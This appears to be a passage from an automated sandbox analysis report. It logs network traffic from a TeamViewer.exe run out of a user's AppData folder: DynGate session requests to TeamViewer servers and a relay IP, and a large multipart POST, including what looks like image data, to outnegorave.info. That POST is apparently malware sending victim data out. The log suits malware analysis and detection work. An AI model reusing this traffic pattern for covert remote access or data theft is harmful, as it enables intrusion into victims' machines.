                                                                                                                                    Sep 15, 2021 13:51:22.058674097 CEST1052OUTGET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.082068920 CEST1052INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.084381104 CEST1052OUTGET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.105417967 CEST1053INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 16
                                                                                                                                    Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 19 98 9c 1b 9a
                                                                                                                                    Data Ascii: $


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    4192.168.2.549761172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    40192.168.2.549747185.188.32.2580C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.142888069 CEST1053OUTGET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.165512085 CEST1054INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 10
                                                                                                                                    Data Raw: 17 24 33 39 32 36 30 37 31 30
                                                                                                                                    Data Ascii: $39260710
                                                                                                                                    Sep 15, 2021 13:51:22.168787956 CEST1054OUTGET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.189806938 CEST1054INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.191895962 CEST1055OUTGET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.268311024 CEST1055INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 9
                                                                                                                                    Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                                    Data Ascii: $ '


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    41192.168.2.549748185.188.32.2580C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.297791958 CEST1056OUTGET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.320568085 CEST1056INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 10
                                                                                                                                    Data Raw: 17 24 33 39 32 36 30 37 31 39
                                                                                                                                    Data Ascii: $39260719
                                                                                                                                    Sep 15, 2021 13:51:22.327142954 CEST1057OUTGET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.349551916 CEST1057INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.350593090 CEST1057OUTGET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.384879112 CEST1057INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 9
                                                                                                                                    Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                                    Data Ascii: $ '


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    42192.168.2.549749185.188.32.2580C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.429137945 CEST1058OUTGET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.451570034 CEST1058INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 10
                                                                                                                                    Data Raw: 17 24 33 39 32 36 30 37 33 36
                                                                                                                                    Data Ascii: $39260736
                                                                                                                                    Sep 15, 2021 13:51:22.455246925 CEST1059OUTGET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.480546951 CEST1059INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.486056089 CEST1059OUTGET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.510013103 CEST1060INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 456
                                                                                                                                    Data Raw: 17 24 13 c3 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 98 9b 9c 17 19 1a 9a 97 18 9a 9a 17 18 9a 18 1d 1c 18 2f 99 99 9c 18 19 2f 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 9a af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 1a af 98 2f 99 9c 98 98 19 98 9c 1b 9a af 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 98 9c 1c 17 18 9b 99 17 19 1a 1b 17 18 9c 19 16 19 18 9b 97 18 9a 1b 17 19 19 97 18 9a 9b 16 19 9b 97 19 1a 99 17 19 19 98 97 18 99 9a 96 19 18 99 97 19 19 1b 97 18 9c 1b 17 18 9a 1a 96 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 9c 96 18 9a 9c 97 1c 17 19 19 1c 97 19 19 9b 16 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9c 18 96 19 9b 97 19 1a 99 17 19 1a 1b 97 18 98 1b 96 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 99 9a 96 1c 9a 17 18 9b 17 1b 17 18 9b 9a 96 19 18 9b 97 18 9a 1b 17 1c 17 1b 9a 96 18 9c 1c 17 18 9b 99 17 19 19 9a 97 18 9a 1c 96 19 9b 97 19 1a 99 17 19 1a 1b 17 18 98 18 16 19 9b 97 19 1a 99 17 19 1a 99 97 18 98 1a 96 18 9a 9c 97 1c 17 1c 1c 17 18 9a 18 96 18 9c 1c 17 1b 1a 97 1b 9b 17 18 99 9b 96 19 18 9b 97 18 9a 1b 17 19 19 97 18 9b 18 16 18 9c 1c 17 18 9b 99 17 19 19 19 97 18 98 1b 96 18 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 99 9a 96 18 9b 9c 17 19 1a 9a 97 18 9a 9a 17 18 9a 18 16 19 9b 97 19 1a 99 17 19 19 99 17 18 98 18 af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                                                    Data Ascii: $ '/////////13&6!


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    43192.168.2.549750178.255.154.14080C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.551965952 CEST1061OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: 178.255.154.140
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.575599909 CEST1061INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 17
                                                                                                                                    Data Raw: 17 24 66 61 73 74 31 32 36 35 32 32 38 30
                                                                                                                                    Data Ascii: $fast12652280
                                                                                                                                    Sep 15, 2021 13:51:22.782339096 CEST1063OUTPOST /dout.aspx?s=12652280&p=10000002&client=DynGate HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: 178.255.154.140
                                                                                                                                    Content-Length: 500000
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    44192.168.2.549751178.255.154.14080C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Sep 15, 2021 13:51:22.604747057 CEST1062OUTPOST /dout.aspx?s=12652280&p=10000001&client=DynGate HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: 178.255.154.140
                                                                                                                                    Content-Length: 3
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.722681046 CEST1062INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.791105032 CEST1063OUTGET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: 178.255.154.140
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.814366102 CEST1063INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 500000
                                                                                                                                    Data Raw: 17 24 11 04 00 05 c6 b3 a2
                                                                                                                                    Data Ascii: $


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    5192.168.2.549762172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    6192.168.2.549763172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    7192.168.2.549764172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    8192.168.2.549767172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    9192.168.2.549770172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.549752172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:51:24 UTC0OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85134
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3509900953
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:51:24 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 30 39 39 30 30 39 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3509900953Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:51:24 UTC0OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 ed 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:51:24 UTC0OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:51:24 UTC16OUTData Raw: 70 dc b2 01 e6 a7 cc bd b3 d0 d7 2d 4a 98 8a 16 94 dd d1 d5 4e 9e 1e bd e3 05 66 79 45 67 eb 3f f1 e8 9f f5 d0 7f 23 5d 17 88 6c 06 9d ac 4d 02 0c 46 7e 74 fa 1e df cc 57 3b ac ff 00 c7 a2 7f d7 41 fc 8d 76 54 92 95 27 25 d5 1c 74 e2 e3 59 45 f4 66 2d 14 51 5e 61 ea 85 14 52 50 07 bd 4b 00 7f 99 38 6f e7 50 0c 83 83 d4 55 c3 54 d8 fe f5 ff 00 de 35 f2 f5 12 dc f5 e2 c9 14 d7 8c 6b df f2 30 6a 5f f5 f5 2f fe 86 6b d9 94 d7 8c eb df f2 30 6a 5f f5 f5 2f fe 86 6b d0 cb 3e 29 1c b8 bd 91 42 96 92 96 bd 93 88 28 c5 14 50 20 c5 7a 1f c2 82 c9 1e b2 d1 ae f6 02 22 17 38 c9 f9 f8 cd 70 10 45 e7 4c b1 83 8c f7 ae ab c3 1a ac fe 1c 5b af b3 a4 73 35 c6 cc 97 07 0b b7 77 a1 ff 00 6a 94 a1 29 c7 42 a3 24 9e a7 a6 fd af 51 ff 00 a0 5f fe 4c 2d 1f 6b d4 7f e8 17 ff 00
                                                                                                                                    Data Ascii: p-JNfyEg?#]lMF~tW;AvT'%tYEf-Q^aRPK8oPUT5k0j_/k0j_/k>)B(P z"8pEL[s5wj)B$Q_L-k
                                                                                                                                    2021-09-15 11:51:24 UTC32OUTData Raw: 54 35 35 b1 69 c3 aa 1f fd 9f 21 ea b4 d6 d3 a4 ec bf a5 4e 9a 8b 0f bd 53 a6 a4 bd ea 1c aa a3 68 c6 8b ea 65 49 63 2a ff 00 01 fc aa bb 5b b2 f5 04 7e 15 d2 26 a3 0f f1 62 a4 fb 55 8c 9f eb 15 69 7b 79 ad e2 68 a8 c1 fc 32 39 61 1e 78 c5 06 23 5d 9d 8d ae 99 3c c1 a3 0a 5b d2 a7 b9 6b 1b 69 0c 42 08 f7 63 3c 81 59 bc 77 bd ca a2 6d 1c 13 71 e6 72 d0 e0 8a 1c f0 09 a5 16 f3 1e 91 48 7f e0 26 bb 19 64 67 18 83 c8 4f f8 0d 67 cd 6d a8 49 d2 e1 7f 0e 2b 48 e2 5b dd 58 ce 54 39 76 77 39 ff 00 b1 cf de 26 1f 5a 43 6e e3 ef 60 7e 35 a7 2e 9f 7c 79 6c b7 e3 55 9e ce e1 3a c4 d5 b4 6a 27 d4 c2 4a 4b a1 57 c8 f5 61 4b e4 a8 ea d5 2b 45 22 f5 52 3f 0a 6e d2 3a 8a d1 34 66 db 1b e5 a0 f5 34 b8 51 fc 22 8a 5a 76 15 d8 64 76 00 52 e4 fa d2 52 d1 62 43 9f 5a 51 49 4b
                                                                                                                                    Data Ascii: T55i!NSheIc*[~&bUi{yh29ax#]<[kiBc<YwmqrH&dgOgmI+H[XT9vw9&ZCn`~5.|ylU:j'JKWaK+E"R?n:4f4Q"ZvdvRRbCZQIK
                                                                                                                                    2021-09-15 11:51:24 UTC48OUTData Raw: d4 b4 da 5a 45 0b 9a 70 a6 8a 51 49 94 87 0a 5c d3 69 c3 9a 4c b4 38 53 f3 4d 51 4f a8 65 a1 45 3e 9a 29 6a 59 a2 16 81 4a 29 d8 a4 52 41 45 14 52 18 e1 4e 14 c1 4f 15 2c a4 38 53 85 34 52 d4 b2 d0 be b5 c2 f8 cc e6 e6 df fd c6 fe 75 dd 66 b8 5f 18 ff 00 c7 d5 bf fb 87 f9 d5 d2 dc 99 ee 8e 1f 34 51 49 58 9d 62 d1 45 14 00 0a 5a 28 a0 02 96 92 96 98 83 bd 14 51 40 06 69 69 29 68 01 68 a4 a5 a6 21 28 a5 34 94 00 51 45 14 00 51 45 14 00 b4 94 52 d0 01 45 14 50 02 d0 29 28 cd 31 0e a2 92 96 98 05 14 52 d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e
                                                                                                                                    Data Ascii: ZEpQI\iL8SMQOeE>)jYJ)RAERNO,8S4Ruf_4QIXbEZ(Q@ii)hh!(4QEQEREP)(1R SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZ
                                                                                                                                    2021-09-15 11:51:24 UTC64OUTData Raw: 16 8a 4a 5a 60 14 51 45 00 14 0a 28 a0 05 a2 93 8a 33 40 0e a2 93 34 66 9d c5 61 c2 8a 6e 68 a2 e1 61 f4 64 53 28 a7 71 58 7e 68 cd 36 8a 2e 16 1d 9a 4c d1 45 00 14 51 45 00 2d 14 94 53 01 69 69 28 14 08 5a 28 a2 80 16 8a 4a 29 88 75 14 94 50 02 8a 5a 4a 28 10 b4 b4 da 5a 60 3a 8a 6d 14 c5 61 d4 52 66 96 80 0a 5a 4a 29 88 5a 28 a2 81 0b 46 69 05 2d 30 16 8a 4a 5a 00 5a 29 29 69 88 5a 29 29 68 10 b4 a2 92 96 98 82 8a 4a 5a 60 2d 2d 36 96 81 0e 14 52 52 d5 08 51 4b 4d cd 2d 31 0e cd 2d 36 96 81 0e 14 a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37
                                                                                                                                    Data Ascii: JZ`QE(3@4fanhadS(qX~h6.LEQE-Sii(Z(J)uPZJ(Z`:maRfZJ)Z(Fi-0JZZ))iZ))hJZ`--6RRQKM-1-6JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h7
                                                                                                                                    2021-09-15 11:51:24 UTC80OUTData Raw: eb 4f ed 47 b3 9f 37 85 df cc 4c 11 78 ad 81 86 cf 3b b8 ed f9 7b 57 49 a4 89 86 9b 10 b8 72 f2 73 92 5f 76 79 3d eb 9e 15 dc aa 7b 37 16 9d ae 5d 48 28 c9 a8 bb ae eb 63 e7 6a 28 a2 ba 4c c2 b5 f4 4f 0d 6a da eb 81 61 6a c6 2c e1 a6 7f 96 35 fc 7b fd 06 4d 64 57 ae 78 53 c3 fa 5e b9 e0 1d 3d 35 0b 55 76 02 50 b2 af 0e 9f bd 7e 8d fd 3a 50 c6 26 93 f0 cb 4b 82 dd bf b5 26 92 ee 77 5c 65 18 a2 a7 d3 1c 93 f5 fc ab 9e d7 fe 1a ea 16 7b a6 d2 24 fb 6c 23 9f 2d b0 b2 8f e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d
                                                                                                                                    Data Ascii: OG7Lx;{WIrs_vy={7]H(cj(LOjaj,5{MdWxS^=5UvP~:P&K&w\e{$l#-7vT}?C6\!R6:wRH%hH L$~5HQDJ*oM
